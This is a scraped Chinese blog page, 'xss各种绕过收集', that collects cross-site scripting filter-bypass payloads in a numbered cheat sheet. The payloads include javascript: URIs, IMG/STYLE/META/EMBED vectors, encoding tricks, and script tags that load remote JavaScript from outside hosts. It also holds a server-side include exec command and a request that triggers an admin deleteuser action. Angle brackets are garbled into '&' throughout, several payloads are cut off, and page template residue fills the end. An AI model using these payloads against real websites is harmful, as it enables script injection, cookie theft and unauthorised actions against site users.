href="javascript:alert('X8SS');//"&getURL("javascript:alert('X9SS')")a="get";b="URL";c="javascript:";d="alert('X10SS');";eval(a+b+c+d);&XML src="javascript:alert('X11SS');"&"& &BODY ONLOAD="a();"&&SCRIPT&function a(){alert('X12SS');}&/SCRIPT&&"&SCRIPT src="http://xss.ha.ckers.org/xss.jpg"&&/SCRIPT&&IMG src="javascript:alert('X13SS')"&!--#exec cmd="/bin/echo '&SCRIPT SRC'"--&&!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js&&/SCRIPT&'"--&&IMG src="/somecommand.php?somevariables=maliciouscode"&&SCRIPT a="&" src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT ="&" src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT a="&" '' src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT "a='&'" src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT&document.write("&SCRI");&/SCRIPT&PT src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&A href=http://www.go//&link&/A&&DIV STYLE="width:expression(alert('anyunix'));"&&IMG SRC='vbscript:msgbox("anyunix")'&&STYLE&width:expression(alert('anyunix'));&/STYLE&(1)普通的XSS JavaScript注入&SCRIPT SRC=http://3w.org/XSS/xss.js&&/SCRIPT&(2)IMG标签XSS使用JavaScript命令&SCRIPT SRC=http://3w.org/XSS/xss.js&&/SCRIPT&(3)IMG标签无分号无引号&IMG SRC=javascript:alert('XSS')&(4)IMG标签大小写不敏感&IMG SRC=JaVaScRiPt:alert('XSS')&(5)HTML编码(必须有分号)&IMG SRC=javascript:alert("XSS")&(6)修正缺陷IMG标签&IMG """&&SCRIPT&alert("XSS")&/SCRIPT&"&(7)formCharCode标签(计算器)&IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&(8)UTF-8的Unicode编码(计算器)&IMG SRC=jav..省略..S')&(9)7位的UTF-8的Unicode编码是没有分号的(计算器)&IMG SRC=jav..省略..S')&(10)十六进制编码也是没有分号(计算器)&IMG SRC=java..省略..XSS')&(11)嵌入式标签,将Javascript分开&IMG SRC="jav ascript:alert('XSS');"&(12)嵌入式编码标签,将Javascript分开&IMG SRC="jav ascript:alert('XSS');"&(13)嵌入式换行符&IMG SRC="jav ascript:alert('XSS');"&(14)嵌入式回车&IMG SRC="jav ascript:alert('XSS');"&(15)嵌入式多行注入JavaScript,这是XSS极端的例子&IMG SRC="javascript:alert('XSS')"&(16)解决限制字符(要求同页面)&script&z='document.'&/script&&script&z=z+'write("'&/script&&script&z=z+'&script'&/script&&script&z=z+' src=ht'&/script&&script&z=z+'tp://ww'&/script&&script&z=z+'w.shell'&/script&&script&z=z+'.net/1.'&/script&&script&z=z+'js&&/sc'&/script&&script&z=z+'ript&")'&/script&&script&eval_r(z)&/script&(17)空字符perl -e 'print "&IMG SRC=java\0script:alert(\"XSS\")&";' & out(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用perl -e 'print "&SCR\0IPT&alert(\"XSS\")&/SCR\0IPT&";' & out(19)Spaces和meta前的IMG标签&IMG SRC=" javascript:alert('XSS');"&(20)Non-alpha-non-digit XSS&SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"&&/SCRIPT&(21)Non-alpha-non-digit XSS to 2&BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")&(22)Non-alpha-non-digit XSS to 3&SCRIPT/SRC="http://3w.org/XSS/xss.js"&&/SCRIPT&(23)双开括号&&SCRIPT&alert("XSS");//&&/SCRIPT&(24)无结束脚本标记(仅火狐等浏览器)&SCRIPT SRC=http://3w.org/XSS/xss.js?&B&(25)无结束脚本标记2&SCRIPT SRC=//3w.org/XSS/xss.js&(26)半开的HTML/JavaScript XSS&IMG SRC="javascript:alert('XSS')"(27)双开角括号&iframe src=http://3w.org/XSS.html &(28)无单引号 双引号 分号&SCRIPT&a=/XSS/alert(a.source)&/SCRIPT&(29)换码过滤的JavaScript\";alert('XSS');//(30)结束Title标签&/TITLE&&SCRIPT&alert("XSS");&/SCRIPT&(31)Input Image&INPUT SRC="javascript:alert('XSS');"&(32)BODY Image&BODY BACKGROUND="javascript:alert('XSS')"&(33)BODY标签&BODY('XSS')&(34)IMG Dynsrc&IMG DYNSRC="javascript:alert('XSS')"&(35)IMG Lowsrc&IMG LOWSRC="javascript:alert('XSS')"&(36)BGSOUND&BGSOUND SRC="javascript:alert('XSS');"&(37)STYLE sheet&LINK REL="stylesheet" HREF="javascript:alert('XSS');"&(38)远程样式表&LINK REL="stylesheet" HREF="http://3w.org/xss.css"&(39)List-style-image(列表式)&STYLE&li {list-style-image: url("javascript:alert('XSS')");}&/STYLE&&UL&&LI&XSS(40)IMG VBscript&IMG SRC='vbscript:msgbox("XSS")'&&/STYLE&&UL&&LI&XSS(41)META链接url&META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"&(42)Iframe&IFRAME SRC="javascript:alert('XSS');"&&/IFRAME&(43)Frame&FRAMESET&&FRAME SRC="javascript:alert('XSS');"&&/FRAMESET&(44)Table&TABLE BACKGROUND="javascript:alert('XSS')"&(45)TD&TABLE&&TD BACKGROUND="javascript:alert('XSS')"&(46)DIV background-image&DIV STYLE="background-image: url(javascript:alert('XSS'))"&(47)DIV background-image后加上额外字符(1-32&34&39&160&&)&DIV STYLE="background-image: url( javascript:alert('XSS'))"&(48)DIV expression&DIV STYLE="width: expression_r(alert('XSS'));"&(49)STYLE属性分拆表达&IMG STYLE="xss:expression_r(alert('XSS'))"&(50)匿名STYLE(组成:开角号和一个字母开头)&XSS STYLE="xss:expression_r(alert('XSS'))"&(51)STYLE background-image&STYLE&.XSS{background-image:url("javascript:alert('XSS')");}&/STYLE&&A CLASS=XSS&&/A&(52)IMG STYLE方式exppression(alert("XSS"))'&(53)STYLE background&STYLE&&STYLE type="text/css"&BODY{background:url("javascript:alert('XSS')")}&/STYLE&(54)BASE&BASE HREF="javascript:alert('XSS');//"&(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS&EMBED SRC="http://3w.org/XSS/xss.swf" &&/EMBED&(56)在flash中使用ActionScrpt可以混进你XSS的代码a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a+b+c+d);(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上&HTML xmlns:xss&&?import namespace="xss" implementation="http://3w.org/XSS/xss.htc"&&xss:xss&XSS&/xss:xss&&/HTML&(58)如果过滤了你的JS你可以在图片里添加JS代码来利用&SCRIPT SRC=""&&/SCRIPT&(59)IMG嵌入式命令,可执行任意命令&IMG SRC="/a.php?a=b"&(60)IMG嵌入式命令(a.jpg在同服务器)Redirect 302 /a.jpg /admin.asp&deleteuser(61)绕符号过滤&SCRIPT a="&" SRC="http://3w.org/xss.js"&&/SCRIPT&(62)&SCRIPT ="&" SRC="http://3w.org/xss.js"&&/SCRIPT&(63)&SCRIPT a="&" " SRC="http://3w.org/xss.js"&&/SCRIPT&(64)&SCRIPT "a='&'" SRC="http://3w.org/xss.js"&&/SCRIPT&(65)&SCRIPT a=`&` SRC="http://3w.org/xss.js"&&/SCRIPT&(66)&SCRIPT a="&'&" SRC="http://3w.org/xss.js"&&/SCRIPT&(67)&SCRIPT&document.write("&SCRI");&/SCRIPT&PT SRC="http://3w.org/xss.js"&&/SCRIPT&(68)URL绕行&A HREF="http://127.0.0.1/"&XSS&/A&(69)URL编码&A HREF="http://3w.org"&XSS&/A&(70)IP十进制&A HREF="http://″&XSS&/A&(71)IP十六进制&A HREF="http://0xc0.0xa8.0×00.0×01″&XSS&/A&(72)IP八进制&A HREF="http://00.0001″&XSS&/A&(73)混合编码&A HREF="htt p://6 6.×7.147/""&XSS&/A&(74)节省[http:]&A HREF="///"&XSS&/A&(75)节省[www]&A HREF="/"&XSS&/A&(76)绝对点绝对DNS&A HREF="./"&XSS&/A&(77)javascript链接&A HREF="javascript:document.location='/'"&XSS&/A&Code: &INPUT TYPE="IMAGE" SRC="javascript:alert(XSS);"&Code: &BODY BACKGROUND="javascript:alert(XSS)"&Code: &BODY ONLOAD=alert(XSS)&Code: &IMG DYNSRC="javascript:alert(XSS)"&Code: &BGSOUND SRC="javascript:alert(XSS);"&Code: &BR SIZE="&{alert(XSS)}"& &(netspace)Code: &LINK REL="stylesheet" HREF="javascript:alert(XSS);"&Code: &LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"&Code: &STYLE&@importhttp://ha.ckers.org/xss.&/STYLE&Code: &META HTTP-EQUIV="Link" Content="&http://ha.ckers.org/xss.css&; REL=stylesheet"&Code: &STYLE&BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}&/STYLE&Code: &XSS STYLE="behavior: url(xss.htc);"&Code: &STYLE&li {list-style-image: url("javascript:alert(XSS)");}&/STYLE&&UL&&LI&XSSCode: &IMG SRC="mocha:[code]"& (netscape only)Code: &IMG SRC="livescript:[code]"& (netscape only)Code: &TABLE BACKGROUND="javascript:alert(XSS)"&Code: &IFRAME SRC="javascript:alert(XSS);"&&/IFRAME&Code: &TABLE&&TD BACKGROUND="javascript:alert(XSS)"&Code: &DIV STYLE="background-image: url(javascript:alert(XSS))"&Code: &BASE HREF="javascript:alert(XSS);//"&&US_ASCII编码（库尔特发现）。使用7位ascii编码代替8位，可以绕过很多过滤。但是必须服务器是以US-ASCII编码交互的。目前仅发现Apache Tomcat是以该方式交互。Code: ?scriptualert(EXSSE)?/scriptu&META协议Code:&META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(XSS);"&Code: &META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&Code: &META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(XSS);"&&对DIV进行unicode编码Code: &DIV STYLE="background-image: 075 072 06C 028 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.3 053 027 029 029"&&使用expression属性Code: &DIV STYLE="width: expression(alert(XSS));"&&STYLE标签Code:&STYLE&@importjavasc ipt:alert("XSS");&/STYLE&Code: &STYLE TYPE="text/javascript"&alert(XSS);&/STYLE&Code: &STYLE&.XSS{background-image:url("javascript:alert(XSS)");}&/STYLE&&A CLASS=XSS&&/A&Code: &STYLE type="text/css"&BODY{background:url("javascript:alert(XSS)")}&/STYLE&&OBJECT标签Code: &OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"&&/OBJECT&Code: &OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-&¶m name=url value=javascript:alert(XSS)&&/OBJECT&&EMBED标签Code: &EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"&&/EMBED&Code: &EMBED SRC="data:image/svg+base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"&&/EMBED&在flas***件中使用如下代码：Code: a="get";b="URL("";c="javascript:";d="alert(XSS);")";eval(a+b+c+d);&XML namespace可以引入行为文件htc但是必须在同一服务器上Code: &HTML xmlns:xss&& &?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"&& &xss:xss&XSS&/xss:xss&&/HTML&Xss.htc: &PUBLIC:COMPONENT TAGNAME="xss"&& &&PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/&&/PUBLIC:COMPONENT&&SCRIPT&& &function main()& &{& & &alert("XSS");& &}&/SCRIPT&&使用CDATA模糊化的XML数据岛Cdoe: &XML ID=I&&X&&C&&![CDATA[&IMG SRC="javas]]&&![CDATA[cript:alert(XSS);"&]]&&/C&&/X&&/xml&&SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&&/SPAN&&XML数据岛Code：&XML ID="xss"&&I&&B&&IMG SRC="javas&!-- --&cript:alert(XSS）
阅读(970)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'xss各种绕过收集',
blogAbstract:'&a href=\"javascrip:alert(document.cookie)\"& 用a标签来弹窗\"&&img src=\"\" onerror=\"document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(10',
blogTag:'',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:9,
publishTime:8,
permalink:'blog/static/',
commentCount:0,
mainCommentCount:0,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'',
hmcon:'0',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人：
{list a as x}
{if !!b&&b.length>0}
他们还推荐了：
{list b as y}
转载记录：
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}